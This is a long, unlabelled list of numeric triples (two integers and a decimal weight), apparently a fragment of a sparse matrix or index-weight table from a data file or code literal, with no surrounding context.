(305, 388, 0.02919),
(174, 388, 0.23331),
(178, 388, 0.23331),
(193, 388, 0.23331),
(236, 388, 0.23331),
(237, 388, 0.23331),
(242, 388, 0.23331),
(243, 388, 0.23331),
(244, 388, 0.23331),
(245, 388, 0.23331),
(269, 388, 0.23331),
(272, 388, 0.23331),
(275, 388, 0.23331),
(280, 388, 0.23331),
(306, 388, 0.23331),
(274, 388, 0.46662),
(159, 388, 0.69993),
(160, 388, 0.69993),
(31, 388, 0.93324),
(250, 388, 0.93324),
(251, 388, 0.93324),
(262, 388, 0.93324),
(31, 389, 0.93331),
(159, 389, 0.93331),
(160, 389, 0.93331),
(250, 389, 0.93331),
(251, 389, 0.93331),
(31, 390, 1.07331),
(159, 390, 1.07331),
(160, 390, 1.07331),
(250, 390, 1.07331),
(251, 390, 1.07331),
(31, 391, 0.98),
(159, 391, 0.98),
(160, 391, 0.98),
(250, 391, 0.98),
(251, 391, 0.98),
(31, 392, 1.05),
(159, 392, 1.05),
(160, 392, 1.05),
(250, 392, 1.05),
(251, 392, 1.05),
(31, 393, 0.93331),
(159, 393, 0.93331),
(160, 393, 0.93331),
(250, 393, 0.93331),
(251, 393, 0.93331),
(31, 394, 1.00331),
(159, 394, 1.00331),
(160, 394, 1.00331),
(250, 394, 1.00331),
(251, 394, 1.00331),
(31, 395, 0.88669),
(250, 395, 0.88669),
(251, 395, 0.88669),
(31, 396, 0.98),
(250, 396, 0.98),
(251, 396, 0.98),
(31, 397, 0.42),
(159, 397, 0.42),
(160, 397, 0.42),
(242, 397, 0.42),
(250, 397, 0.42),
(251, 397, 0.42),
(31, 398, 0.98),
(159, 398, 0.98),
(160, 398, 0.98),
(250, 398, 0.98),
(251, 398, 0.98),
(31, 399, 1.09669),
(159, 399, 1.09669),
(160, 399, 1.09669),
(250, 399, 1.09669),
(251, 399, 1.09669),
(31, 400, 0.37338),
(159, 400, 0.37338),
(160, 400, 0.37338),
(250, 400, 0.37338),
(251, 400, 0.37338),
(31, 401, 1.77338),
(159, 401, 1.77338),
(160, 401, 1.77338),
(250, 401, 1.77338),
(251, 401, 1.77338),
(31, 402, 0.93331),
(159, 402, 0.93331),
(160, 402, 0.93331),
(250, 402, 0.93331),
(251, 402, 0.93331),
(31, 403, 1.07331),
(159, 403, 1.07331),
(160, 403, 1.07331),
(250, 403, 1.07331),
(251, 403, 1.07331),
(31, 404, 0.14),
(160, 404, 0.14),
(174, 404, 0.14),
(193, 404, 0.14),
(233, 404, 0.14),
(238, 404, 0.14),
(241, 404, 0.14),
(242, 404, 0.14),
(247, 404, 0.14),
(250, 404, 0.14),
(251, 404, 0.14),
(256, 404, 0.14),
(258, 404, 0.14),
(263, 404, 0.14),
(272, 404, 0.14),
(275, 404, 0.14),
(280, 404, 0.14),
(246, 404, 0.28),
(253, 404, 0.28),
(269, 404, 0.28),
(290, 404, 0.42),
(31, 405, 0.93331),
(160, 405, 0.93331),
(250, 405, 0.93331),
(251, 405, 0.93331),
(31, 406, 1.02669),
(160, 406, 1.02669),
(250, 406, 1.02669),
(251, 406, 1.02669),
(159, 1105, 1.00331),
(160, 1105, 1.00331),
(159, 1106, 0.98),
(160, 1106, 0.98),
(242, 1106, 0.98),
(243, 1106, 0.98),
(259, 1106, 0.98),
(260, 1106, 0.98),
(261, 1106, 0.98),
(275, 1106, 0.98),
(305, 1106, 0.98),
(262, 1106, 4.9),
(159, 1107, 0.84),
(160, 1107, 0.84),
(193, 1107, 0.84),
(236, 1107, 0.84),
(238, 1107, 0.84),
(242, 1107, 0.84),
(243, 1107, 0.84),
(244, 1107, 0.84),
(248, 1107, 0.84),
(258, 1107, 0.84),
(263, 1107, 0.84),
(264, 1107, 0.84),
(268, 1107, 0.84),
(269, 1107, 0.84),
(272, 1107, 0.84),
(273, 1107, 0.84),
(275, 1107, 0.84),
(280, 1107, 0.84),
(299, 1107, 0.84),
(304, 1107, 0.84),
(262, 1107, 1.68),
(274, 1107, 1.68),
(306, 1107, 1.68),
(239, 1107, 2.52),
(247, 1107, 2.52),
(240, 1107, 3.36),
(159, 1108, 1.02669),
(160, 1108, 1.02669),
(159, 1109, 0.23331),
(160, 1109, 0.23331),
(305, 1109, 0.23331),
(159, 1110, 1.07331),
(160, 1110, 1.07331),
(159, 1111, 1.14331),
(160, 1111, 1.14331),
(301, 1596, 0.09324),
(161, 1596, 0.18669),
(178, 1596, 0.18669),
(193, 1596, 0.18669),
(237, 1596, 0.18669),
(238, 1596, 0.18669),
(256, 1596, 0.18669),
(257, 1596, 0.18669),
(262, 1596, 0.18669),
(263, 1596, 0.18669),
(306, 1596, 0.18669),
(174, 1596, 0.37338),
(241, 1596, 0.37338),
(272, 1596, 0.37338),
(273, 1596, 0.37338),
(280, 1596, 0.37338),
(275, 1596, 0.56007),
(270, 1596, 0.74676),
(265, 1596, 0.93345),
(266, 1596, 0.93345),
(268, 1596, 0.93345),
(292, 1596, 1.12014),
(294, 1596, 1.70688),
(241, 2542, 0.32669),
(255, 2542, 0.32669),
(257, 2542, 0.32669),
(258, 2542, 0.32669),
(259, 2542, 0.32669),
(260, 2542, 0.32669),
(261, 2542, 0.32669),
(263, 2542, 0.32669),
(264, 2542, 0.32669),
(304, 2542, 0.32669),
(305, 2542, 0.32669),
(31, 2542, 1.12008),
(159, 2542, 1.12008),
(160, 2542, 1.12008),
(174, 2542, 1.12008),
(250, 2542, 1.12008),
(251, 2542, 1.12008),
(252, 2542, 1.12008),
(256, 2542, 1.12008),
(265, 2542, 1.12008),
(266, 2542, 1.12008),
(267, 2542, 1.12008),
(274, 2542, 1.12008),
(275, 2542, 1.12008),
(280, 2542, 1.12008),
(290, 2542, 1.12008),
(299, 2542, 1.12008),
(237, 2542, 1.44677),
(253, 2542, 1.44677),
(254, 2542, 1.44677),
(268, 2542, 1.44677),
(269, 2542, 1.44677),
(270, 2542, 1.44677),
(272, 2542, 1.44677),
(273, 2542, 1.44677),
(288, 2542, 1.44677),
(292, 2542, 1.44677),
(301, 2542, 1.44677),
(31, 2543, 3.6),
(159, 2543, 3.6),
(160, 2543, 3.6),
(174, 2543, 3.6),
(237, 2543, 3.6),
(250, 2543, 3.6),
(251, 2543, 3.6),
(252, 2543, 3.6),
(253, 2543, 3.6),
(254, 2543, 3.6),
(256, 2543, 3.6),
(265, 2543, 3.6),
(266, 2543, 3.6),
(267, 2543, 3.6),
(268, 2543, 3.6),
(269, 2543, 3.6),
(270, 2543, 3.6),
(272, 2543, 3.6),
(273, 2543, 3.6),
(274, 2543, 3.6),
(275, 2543, 3.6),
(280, 2543, 3.6),
(288, 2543, 3.6),
(290, 2543, 3.6),
(292, 2543, 3.6),
(299, 2543, 3.6),
(301, 2543, 3.6),
(305, 10432, 0.04662),
(178, 10432, 0.18669),
(242, 10432, 0.18669),
(243, 10432, 0.18669),
(246, 10432, 0.18669),
(249, 10432, 0.18669),
(255, 10432, 0.18669),
(268, 10432, 0.18669),
(274, 10432, 0.18669),
(306, 10432, 0.56007),
(251, 10432, 1.52019),
(299, 10435, 0.02331),
(301, 10435, 0.04662),
(305, 10435, 0.04662),
(243, 10435, 0.18669),
(256, 10435, 0.18669),
(259, 10435, 0.18669),
(260, 10435, 0.18669),
(262, 10435, 0.18669),
(267, 10435, 0.18669),
(268, 10435, 0.18669),
(273, 10435, 0.18669),
(292, 10435, 0.18669),
(174, 10435, 0.37338),
(237, 10435, 0.37338),
(240, 10435, 0.37338),
(241, 10435, 0.37338),
(242, 10435, 0.37338),
(244, 10435, 0.37338),
(255, 10435, 0.37338),
(258, 10435, 0.37338),
(270, 10435, 0.37338),
(238, 10435, 0.56007),
(254, 10435, 0.56007),
(264, 10435, 0.56007),
(251, 10435, 1.52019),
(236, 13067, 0.28),
(252, 13067, 0.28),
(262, 13067, 0.28),
(264, 13067, 0.56),
(168, 13072, 0.84),
(174, 13072, 0.84),
(235, 13072, 0.84),
(238, 13072, 0.84),
(249, 13072, 0.84),
(254, 13072, 0.84),
(256, 13072, 0.84),
(262, 13072, 0.84),
(265, 13072, 0.84),
(266, 13072, 0.84),
(272, 13072, 0.84),
(273, 13072, 0.84),
(288, 13072, 0.84),
(290, 13072, 0.84),
(295, 13072, 0.84),
(305, 13072, 0.84),
(242, 13072, 1.68),
(255, 13072, 1.68),
(259, 13072, 1.68),
(260, 13072, 1.68),
(264, 13072, 1.68),
(267, 13072, 1.68),
(270, 13072, 1.68),
(301, 13072, 1.68),
(304, 13072, 1.68),
(233, 13072, 2.52),
(237, 13072, 2.52),
(258, 13072, 2.52),
(263, 13072, 2.52),
(269, 13072, 2.52),
(275, 13072, 2.52),
(236, 13072, 3.36),
(252, 13072, 3.36),
(299, 13072, 3.36),
(274, 13072, 5.04),
(298, 13072, 5.04),
(308, 13072, 5.04),
(257, 13072, 5.88),
(306, 13072, 5.88),
(243, 13072, 6.72),
(193, 13072, 7.56),
(168, 13073, 0.91),
(252, 13073, 0.91),
(257, 13073, 0.91),
(275, 13073, 0.91),
(274, 13073, 1.82),
(235, 13077, 0.84),
(237, 13077, 0.84),
(252, 13077, 0.84),
(253, 13077, 0.84),
(265, 13077, 0.84),
(266, 13077, 0.84),
(275, 13077, 0.84),
(292, 13077, 0.84),
(168, 13077, 1.68),
(248, 13077, 1.68),
(252, 13081, 0.98),
(257, 13081, 0.98),
(174, 13082, 0.95669),
(178, 13082, 0.95669),
(235, 13082, 0.95669),
(237, 13082, 0.95669),
(242, 13082, 0.95669),
(243, 13082, 0.95669),
(244, 13082, 0.95669),
(252, 13082, 0.95669),
(290, 13082, 0.95669),
(292, 13082, 0.95669),
(299, 13082, 0.95669),
(238, 13082, 1.91338),
(257, 13082, 1.91338),
(267, 13082, 1.91338),
(258, 13082, 13.3937),
(241, 13084, 0.84),
(243, 13084, 0.84),
(244, 13084, 0.84),
(252, 13084, 0.84),
(255, 13084, 0.84),
(261, 13084, 0.84),
(262, 13084, 0.84),
(268, 13084, 0.84),
(292, 13084, 1.68),
(304, 13088, 0.0175),
(305, 13088, 0.0175),
(299, 13088, 0.035),
(235, 13088, 0.14),
(238, 13088, 0.14),
(242, 13088, 0.14),
(244, 13088, 0.14),
(245, 13088, 0.14),
(247, 13088, 0.14),
(252, 13088, 0.14),
(256, 13088, 0.14),
(259, 13088, 0.14),
(260, 13088, 0.14),
(262, 13088, 0.14),
(273, 13088, 0.14),
(274, 13088, 0.14),
(287, 13088, 0.14),
(168, 13088, 0.28),
(240, 13088, 0.28),
(241, 13088, 0.28),
(246, 13088, 0.28),
(255, 13088, 0.28),
(257, 13088, 0.28),
(263, 13088, 0.28),
(174, 13088, 0.42),
(178, 13088, 0.42),
(193, 13088, 0.42),
(268, 13088, 0.56),
(288, 13088, 0.56),
(239, 13088, 0.7),
(253, 13088, 0.7),
(246, 13089, 0.88669),
(252, 13089, 0.88669),
(253, 13089, 0.88669),
(174, 16629, 0.79331),
(178, 16629, 0.79331),
(193, 16629, 0.79331),
(233, 16629, 0.79331),
(239, 16629, 0.79331),
(243, 16629, 0.79331),
(247, 16629, 0.79331),
(248, 16629, 0.79331),
(272, 16629, 0.79331),
(274, 16629, 0.79331),
(280, 16629, 0.79331),
(288, 16629, 0.79331),
(292, 16629, 0.79331),
(245, 16629, 1.58662),
(262, 16629, 1.58662),
(299, 16629, 1.58662),
(242, 16629, 2.37993),
(306, 16629, 2.37993),
(168, 16648, 0.86331),
(233, 16648, 0.86331),
(241, 16648, 0.86331),
(243, 16648, 0.86331),
(247, 16648, 0.86331),
(257, 16648, 0.86331),
(258, 16648, 0.86331),
(254, 16648, 1.72662),
(305, 16648, 1.72662),
(299, 16648, 2.58993),
(239, 16689, 0.84),
(242, 16689, 0.84),
(244, 16689, 0.84),
(253, 16689, 0.84),
(257, 16689, 0.84),
(269, 16689, 0.84),
(288, 16689, 0.84),
(290, 16689, 0.84),
(292, 16689, 0.84),
(298, 16689, 0.84),
(299, 16689, 0.84),
(304, 16689, 0.84),
(305, 16689, 0.84),
(308, 16689, 0.84),
(306, 16689, 1.68),
(242, 16690, 0.93331),
(257, 16690, 0.93331),
(269, 16690, 0.93331),
(290, 16690, 0.93331),
(292, 16690, 0.93331),
(298, 16690, 0.93331),
(299, 16690, 0.93331),
(304, 16690, 0.93331),
(305, 16690, 0.93331),
(306, 16690, 0.93331),
(308, 16690, 0.93331),
(233, 21161, 0.91),
(243, 21161, 0.91),
(269, 21161, 0.91),
(306, 21161, 0.91),
(248, 21168, 0.95669),
(267, 21168, 0.95669),
(268, 21168, 0.95669),
(298, 21168, 1.91338),
(304, 21168, 1.91338),
(308, 21168, 1.91338),
(233, 21168, 2.87007),
(305, 21168, 4.78345),
(233, 21173, 0.84),
(237, 21173, 0.84),
(249, 21173, 0.84),
(292, 21173, 0.84),
(193, 23770, 0.84),
(236, 23770, 0.84),
(238, 23770, 0.84),
(242, 23770, 0.84),
(262, 23770, 0.84),
(299, 23770, 0.84),
(244, 23770, 2.52),
(235, 23775, 0.93331),
(263, 23775, 0.93331),
(269, 23775, 0.93331),
(275, 23775, 0.93331),
(306, 23775, 0.93331),
(242, 23775, 1.86662),
(243, 23775, 1.86662),
(299, 23775, 1.86662),
(193, 23777, 0.88669),
(247, 23777, 0.88669),
(248, 23777, 0.88669),
(249, 23777, 0.88669),
(258, 23777, 0.88669),
(299, 23777, 0.88669),
(306, 23777, 0.88669),
(270, 23777, 2.66007),
(301, 23777, 2.66007),
(236, 23781, 0.88669),
(237, 23781, 0.88669),
(241, 23781, 0.88669),
(245, 23781, 0.88669),
(246, 23781, 0.88669),
(254, 23781, 0.88669),
(256, 23781, 0.88669),
(273, 23781, 0.88669),
(305, 23781, 0.88669),
(306, 23781, 0.88669),
(174, 23781, 1.77338),
(235, 23781, 1.77338),
(243, 23781, 1.77338),
(299, 23781, 1.77338),
(238, 23784, 0.98),
(247, 23784, 0.98),
(299, 23784, 0.98),
(247, 23785, 1.07331),
(299, 23785, 1.07331),
(254, 23787, 0.95669),
(299, 23787, 0.95669),
(264, 23789, 0.86331),
(299, 23789, 0.86331),
(253, 23791, 0.84),
(275, 23791, 0.84),
(299, 23791, 0.84),
(244, 23793, 1.00331),
(299, 23793, 1.00331),
(244, 23794, 1.14331),
(299, 23794, 1.14331),
(269, 23796, 1.00331),
(299, 23796, 1.00331),
(304, 23796, 1.00331),
(240, 23796, 2.00662),
(193, 23799, 0.86331),
(256, 23799, 0.86331),
(272, 23799, 0.86331),
(280, 23799, 0.86331),
(299, 23799, 0.86331),
(306, 23799, 0.86331),
(261, 23803, 1.07331),
(299, 23804, 0.0175),
(174, 23804, 0.14),
(235, 23804, 0.14),
(236, 23804, 0.14),
(239, 23804, 0.14),
(306, 23804, 0.14),
(263, 23804, 0.42),
(168, 23811, 0.84),
(274, 23811, 0.84),
(262, 23811, 1.68),
(244, 23813, 0.98),
(274, 23813, 0.98),
(299, 23813, 0.98),
(174, 23814, 0.88669),
(299, 23814, 0.88669),
(237, 23816, 0.86331),
(299, 23816, 0.86331),
(254, 23818, 0.86331),
(299, 23818, 0.86331),
(269, 23826, 0.84),
(299, 23826, 0.84),
(269, 23827, 0.93331),
(299, 23827, 0.93331),
(269, 23832, 0.84),
(299, 23832, 0.84),
(299, 23836, 0.0175),
(174, 23836, 0.14),
(239, 23836, 0.14),
(243, 23836, 0.14),
(246, 23836, 0.14),
(301, 23836, 0.1425),
(304, 23836, 0.1425),
(305, 23836, 0.1425),
(44, 23836, 0.28),
(242, 23836, 0.28),
(244, 23836, 0.28),
(256, 23836, 0.34),
(288, 23836, 0.34),
(240, 23836, 0.42),
(306, 23836, 0.42),
(235, 23836, 0.98),
(241, 23836, 1.14),
(255, 23836, 1.14),
(259, 23836, 1.14),
(260, 23836, 1.14),
(261, 23836, 1.14),
(262, 23836, 1.14),
(265, 23836, 1.14),
(266, 23836, 1.14),
(268, 23836, 1.14),
(270, 23836, 1.14),
(272, 23836, 1.14),
(274, 23836, 1.14),
(280, 23836, 1.14),
(257, 23836, 1.28),
(263, 23836, 1.28),
(264, 23836, 1.28),
(267, 23836, 1.28),
(273, 23836, 1.28),
(275, 23836, 1.28),
(290, 23836, 1.28),
(292, 23836, 1.28),
(258, 23836, 1.56),
(269, 23836, 1.56),
(244, 23841, 0.88669),
(299, 23841, 0.88669),
(244, 23842, 0.98),
(299, 23842, 0.98),
(247, 25235, 0.42),
(257, 25235, 0.42),
(274, 25235, 0.42),
(298, 25235, 0.42),
(304, 25235, 0.42),
(308, 25235, 0.42),
(306, 25235, 0.84),
(275, 25235, 1.68),
(273, 25235, 2.7),
(298, 25236, 0.98),
(304, 25236, 0.98),
(308, 25236, 0.98),
(275, 25236, 1.96),
(275, 25237, 1.14331),
(298, 25237, 1.14331),
(308, 25237, 1.14331),
(240, 25238, 1.00331),
(242, 25238, 1.00331),
(243, 25238, 1.00331),
(298, 25238, 1.00331),
(308, 25238, 1.00331),
(239, 25238, 4.01324),
(240, 25239, 1.09669),
(298, 25239, 1.09669),
(308, 25239, 1.09669),
(237, 25251, 1.00331),
(262, 25251, 1.00331),
(267, 25251, 1.00331),
(288, 25251, 1.00331),
(298, 25251, 1.00331),
(308, 25251, 1.00331),
(304, 25251, 2.00662),
(275, 25252, 0.95669),
(304, 25252, 0.95669),
(298, 25252, 1.91338),
(308, 25252, 1.91338),
(263, 25253, 0.37331),
(308, 25253, 0.37331),
(168, 25258, 0.32669),
(256, 25258, 0.32669),
(264, 25258, 0.32669),
(298, 25258, 0.32669),
(308, 25258, 0.32669),
(239, 25258, 0.65338),
(193, 25258, 0.98007),
(168, 25259, 0.93331),
(193, 25259, 0.93331),
(256, 25259, 0.93331),
(298, 25259, 0.93331),
(308, 25259, 0.93331),
(249, 25261, 0.32669),
(298, 25261, 0.32669),
(308, 25261, 0.32669),
(235, 25932, 0.84),
(239, 25932, 0.84),
(242, 25932, 0.84),
(44, 25932, 1.68),
(306, 25932, 1.68),
(44, 25933, 2.05338),
(44, 25934, 1.91338),
(44, 25935, 2.1),
(261, 25984, 0.95669),
(45, 25984, 2.32339),
(193, 26055, 1.02669),
(273, 26055, 1.02669),
(306, 26055, 1.02669),
(49, 26055, 2.49339),
(178, 28659, 0.79331),
(193, 28659, 0.79331),
(242, 28659, 0.79331),
(249, 28659, 0.79331),
(253, 28659, 0.79331),
(267, 28659, 0.79331),
(193, 28666, 0.86331),
(253, 28666, 0.86331),
(244, 36808, 0.88669),
(253, 36808, 0.88669),
(254, 36808, 0.88669),
(237, 36829, 1.05),
(241, 36829, 1.05),
(253, 36829, 1.05),
(254, 36829, 1.05),
(255, 36829, 1.05),
(257, 36829, 1.05),
(258, 36829, 1.05),
(259, 36829, 1.05),
(260, 36829, 1.05),
(261, 36829, 1.05),
(263, 36829, 1.05),
(264, 36829, 1.05),
(268, 36829, 1.05),
(269, 36829, 1.05),
(270, 36829, 1.05),
(272, 36829, 1.05),
(273, 36829, 1.05),
(288, 36829, 1.05),
(292, 36829, 1.05),
(301, 36829, 1.05),
(304, 36829, 1.05),
(305, 36829, 1.05),
(243, 36832, 1.00331),
(253, 36832, 1.00331),
(253, 36834, 0.86331),
(174, 36834, 1.72662),
(168, 36837, 0.37331),
(174, 36837, 0.37331),
(253, 36837, 0.37331),
(254, 36837, 0.37331),
(275, 36837, 0.37331),
(274, 36837, 0.74662),
(253, 36838, 0.98),
(274, 36838, 0.98),
(168, 36840, 0.28),
(239, 36840, 0.28),
(240, 36840, 0.28),
(242, 36840, 0.28),
(245, 36840, 0.28),
(246, 36840, 0.28),
(253, 36840, 0.28),
(254, 36840, 0.28),
(256, 36840, 0.28),
(262, 36840, 0.28),
(168, 36843, 0.84),
(174, 36843, 0.84),
(235, 36843, 0.84),
(239, 36843, 0.84),
(242, 36843, 0.84),
(247, 36843, 0.84),
(256, 36843, 0.84),
(259, 36843, 0.84),
(260, 36843, 0.84),
(263, 36843, 0.84),
(268, 36843, 0.84),
(273, 36843, 0.84),
(274, 36843, 0.84),
(288, 36843, 0.84),
(304, 36843, 0.84),
(178, 36843, 1.68),
(257, 36843, 1.68),
(253, 36843, 2.52),
(235, 36844, 0.93331),
(253, 36844, 0.93331),
(247, 36846, 0.95669),
(253, 36846, 0.95669),
(256, 36846, 0.95669),
(257, 36846, 1.91338),
(236, 51229, 0.91),
(238, 51229, 0.91),
(235, 51229, 7.93),
(236, 51239, 1.05),
(306, 51239, 1.05),
(235, 51239, 2.1),
(235, 51241, 1.07331),
(238, 51241, 1.07331),
(236, 51243, 1.00331),
(243, 51243, 1.00331),
(235, 51243, 2.00662),
(178, 51248, 0.88669),
(235, 51248, 0.88669),
(235, 51250, 1.00331),
(236, 51250, 1.00331),
(306, 51250, 1.00331),
(235, 51252, 0.84),
(168, 51252, 1.68),
(178, 51254, 0.86331),
(235, 51254, 0.86331),
(241, 51254, 0.86331),
(269, 51254, 0.86331),
(235, 51265, 0.84),
(261, 51265, 0.84),
(264, 51265, 0.84),
(270, 51265, 0.84),
(301, 51265, 0.84),
(242, 65072, 0.37331),
(292, 65072, 0.37331),
(193, 65072, 0.74662),
(193, 65085, 0.95669),
(237, 65085, 0.95669),
(257, 65085, 0.95669),
(306, 65085, 0.95669),
(243, 65086, 0.93331),
(193, 65086, 1.86662),
(193, 65099, 1.07331),
(259, 65099, 1.07331),
(260, 65099, 1.07331),
(168, 65110, 0.18669),
(193, 65110, 0.18669),
(262, 65110, 0.18669),
(268, 65110, 0.18669),
(272, 65110, 0.18669),
(280, 65110, 0.18669),
(288, 65110, 0.18669),
(243, 65110, 0.56007),
(193, 65118, 0.79331),
(240, 65118, 0.79331),
(257, 65118, 0.79331),
(306, 65118, 0.79331),
(245, 65132, 0.88669),
(255, 65132, 0.88669),
(193, 65132, 1.77338),
(193, 65135, 0.32669),
(242, 65135, 0.32669),
(237, 65135, 0.98007),
(237, 68775, 0.95669),
(254, 68775, 0.95669),
(237, 68776, 1.07331),
(254, 68776, 1.07331),
(237, 74560, 0.98),
(238, 74560, 0.98),
(274, 74560, 0.98),
(168, 75888, 0.88669),
(239, 75888, 0.88669),
(240, 75888, 0.88669),
(306, 75888, 1.77338),
(254, 75888, 2.66007),
(241, 75888, 3.54676),
(254, 75894, 0.98),
(258, 75894, 0.98),
(261, 75910, 0.93331),
(254, 75910, 3.73324),
(238, 75920, 0.86331),
(254, 75920, 0.86331),
(264, 75920, 0.86331),
(254, 75922, 0.91),
(255, 75922, 0.91),
(242, 77948, 0.18669),
(249, 77948, 0.18669),
(258, 77948, 0.18669),
(272, 77948, 0.18669),
(273, 77948, 0.18669),
(280, 77948, 0.18669),
(305, 77948, 0.18669),
(236, 77948, 0.37338),
(275, 77948, 0.37338),
(236, 77961, 0.88669),
(267, 77961, 0.88669),
(236, 77966, 0.91),
(269, 77966, 0.91),
(236, 77971, 0.91),
(264, 77971, 0.91),
(265, 77971, 0.91),
(266, 77971, 0.91),
(270, 77971, 0.91),
(301, 77971, 0.91),
(274, 77971, 1.82),
(236, 77977, 0.91),
(243, 77977, 0.91),
(236, 77983, 0.88669),
(243, 77983, 2.66007),
(236, 77987, 0.98),
(238, 77987, 0.98),
(236, 77988, 0.88669),
(244, 77988, 0.88669),
(304, 77988, 0.88669),
(305, 77988, 0.88669),
(306, 77988, 0.88669),
(236, 77990, 0.88669),
(242, 77990, 0.88669),
(288, 77990, 0.88669),
(236, 77995, 0.88669),
(239, 77995, 0.88669),
(240, 77995, 0.88669),
(272, 77995, 0.88669),
(280, 77995, 0.88669),
(306, 77995, 0.88669),
(236, 77997, 0.88669),
(262, 77997, 0.88669),
(236, 77999, 0.98),
(239, 77999, 0.98),
(240, 77999, 0.98),
(263, 77999, 0.98),
(264, 77999, 0.98),
(269, 77999, 0.98),
(306, 77999, 0.98),
(237, 84786, 0.93331),
(263, 84786, 0.93331),
(237, 84793, 0.86331),
(242, 84793, 0.86331),
(259, 84793, 0.86331),
(260, 84793, 0.86331),
(262, 84793, 0.86331),
(299, 84793, 0.86331),
(306, 84793, 0.86331),
(237, 84794, 0.98),
(259, 84794, 0.98),
(260, 84794, 0.98),
(237, 84795, 0.88669),
(256, 84795, 0.88669),
(174, 84809, 0.91),
(237, 84809, 0.91),
(256, 84809, 0.91),
(265, 84809, 0.91),
(266, 84809, 0.91),
(270, 84809, 3.64),
(301, 84809, 3.64),
(237, 84810, 1.02669),
(265, 84810, 1.02669),
(266, 84810, 1.02669),
(270, 84810, 4.10676),
(301, 84810, 4.10676),
(238, 92489, 1.05),
(168, 92489, 2.1),
(238, 92491, 0.91),
(248, 92491, 0.91),
(305, 92491, 0.91),
(238, 92494, 0.86331),
(242, 92494, 0.86331),
(295, 92494, 0.86331),
(174, 92511, 0.88669),
(238, 92511, 0.88669),
(178, 92515, 0.86331),
(238, 92515, 0.86331),
(239, 92515, 0.86331),
(288, 92515, 0.86331),
(238, 92520, 0.91),
(275, 92520, 0.91),
(178, 100767, 0.32669),
(239, 100767, 0.32669),
(239, 100774, 0.81669),
(272, 100774, 0.81669),
(280, 100774, 0.81669),
(239, 100781, 1.14331),
(242, 100781, 1.14331),
(239, 100784, 0.98),
(240, 100784, 0.98),
(239, 100788, 2.38),
(242, 100788, 2.38),
(240, 100788, 3.36),
(239, 100789, 2.60661),
(242, 100789, 2.60661),
(240, 100789, 3.67992),
(239, 100793, 0.98),
(256, 100793, 0.98),
(240, 100799, 0.98),
(241, 100799, 0.98),
(248, 100799, 0.98),
(239, 100799, 1.96),
(240, 100800, 0.86331),
(242, 100800, 0.86331),
(247, 100800, 0.86331),
(256, 100800, 0.86331),
(263, 100800, 0.86331),
(292, 100800, 0.86331),
(239, 100800, 1.72662),
(239, 100816, 0.91),
(268, 100816, 0.91),
(288, 100816, 0.91),
(239, 100822, 0.46669),
(246, 100822, 0.46669),
(305, 100822, 0.93338),
(239, 100833, 0.23331),
(290, 100833, 0.23331),
(292, 100833, 0.23331),
(272, 100833, 0.46662),
(280, 100833, 0.46662),
(264, 100833, 0.69993),
(239, 100834, 0.88669),
(264, 100834, 0.88669),
(272, 100834, 0.88669),
(280, 100834, 0.88669),
(239, 100845, 0.86331),
(246, 100845, 0.86331),
(262, 100845, 0.86331),
(242, 102148, 0.32669),
(255, 102148, 0.32669),
(258, 102148, 0.32669),
(273, 102148, 0.98007),
(255, 102149, 1.00331),
(258, 102149, 1.00331),
(255, 102150, 1.12),
(258, 102150, 1.12),
(255, 102153, 0.95669),
(265, 102153, 0.95669),
(266, 102153, 0.95669),
(304, 102153, 0.95669),
(255, 102155, 0.93331),
(258, 102155, 0.93331),
(273, 102155, 0.93331),
(255, 102156, 1.07331),
(258, 102156, 1.07331),
(241, 102157, 0.93331),
(255, 102157, 0.93331),
(255, 102158, 0.81669),
(268, 102158, 0.81669),
(246, 102160, 0.88669),
(255, 102160, 0.88669),
(305, 102160, 0.88669),
(306, 102160, 0.88669),
(246, 102161, 0.98),
(255, 102161, 0.98),
(241, 102165, 5.3332),
(255, 102165, 5.3332),
(257, 102165, 5.3332),
(258, 102165, 5.3332),
(259, 102165, 5.3332),
(260, 102165, 5.3332),
(261, 102165, 5.3332),
(262, 102165, 5.3332),
(263, 102165, 5.3332),
(264, 102165, 5.3332),
(265, 102165, 5.3332),
(266, 102165, 5.3332),
(267, 102165, 5.3332),
(268, 102165, 5.3332),
(269, 102165, 5.3332),
(270, 102165, 5.3332),
(272, 102165, 5.3332),
(273, 102165, 5.3332),
(274, 102165, 5.3332),
(275, 102165, 5.3332),
(280, 102165, 5.3332),
(290, 102165, 5.3332),
(292, 102165, 5.3332),
(301, 102165, 5.3332),
(304, 102165, 5.3332),
(305, 102165, 5.3332),
(241, 102166, 5.6),
(255, 102166, 5.6),
(257, 102166, 5.6),
(258, 102166, 5.6),
(259, 102166, 5.6),
(260, 102166, 5.6),
(261, 102166, 5.6),
(262, 102166, 5.6),
(263, 102166, 5.6),
(264, 102166, 5.6),
(265, 102166, 5.6),
(266, 102166, 5.6),
(267, 102166, 5.6),
(268, 102166, 5.6),
(269, 102166, 5.6),
(270, 102166, 5.6),
(272, 102166, 5.6),
(273, 102166, 5.6),
(274, 102166, 5.6),
(275, 102166, 5.6),
(280, 102166, 5.6),
(290, 102166, 5.6),
(292, 102166, 5.6),
(301, 102166, 5.6),
(304, 102166, 5.6),
(305, 102166, 5.6),
(241, 102167, 2.38),
(255, 102167, 2.38),
(256, 102167, 2.38),
(257, 102167, 2.38),
(258, 102167, 2.38),
(259, 102167, 2.38),
(260, 102167, 2.38),
(261, 102167, 2.38),
(262, 102167, 2.38),
(263, 102167, 2.38),
(264, 102167, 2.38),
(265, 102167, 2.38),
(266, 102167, 2.38),
(267, 102167, 2.38),
(268, 102167, 2.38),
(269, 102167, 2.38),
(270, 102167, 2.38),
(272, 102167, 2.38),
(273, 102167, 2.38),
(274, 102167, 2.38),
(275, 102167, 2.38),
(280, 102167, 2.38),
(288, 102167, 2.38),
(290, 102167, 2.38),
(292, 102167, 2.38),
(301, 102167, 2.38),
(304, 102167, 2.38),
(305, 102167, 2.38),
(241, 102168, 2.72),
(255, 102168, 2.72),
(256, 102168, 2.72),
(257, 102168, 2.72),
(258, 102168, 2.72),
(259, 102168, 2.72),
(260, 102168, 2.72),
(261, 102168, 2.72),
(262, 102168, 2.72),
(263, 102168, 2.72),
(264, 102168, 2.72),
(265, 102168, 2.72),
(266, 102168, 2.72),
(267, 102168, 2.72),
(268, 102168, 2.72),
(269, 102168, 2.72),
(270, 102168, 2.72),
(272, 102168, 2.72),
(273, 102168, 2.72),
(274, 102168, 2.72),
(275, 102168, 2.72),
(280, 102168, 2.72),
(288, 102168, 2.72),
(290, 102168, 2.72),
(292, 102168, 2.72),
(301, 102168, 2.72),
(304, 102168, 2.72),
(305, 102168, 2.72),
(240, 102169, 0.84),
(241, 102169, 0.84),
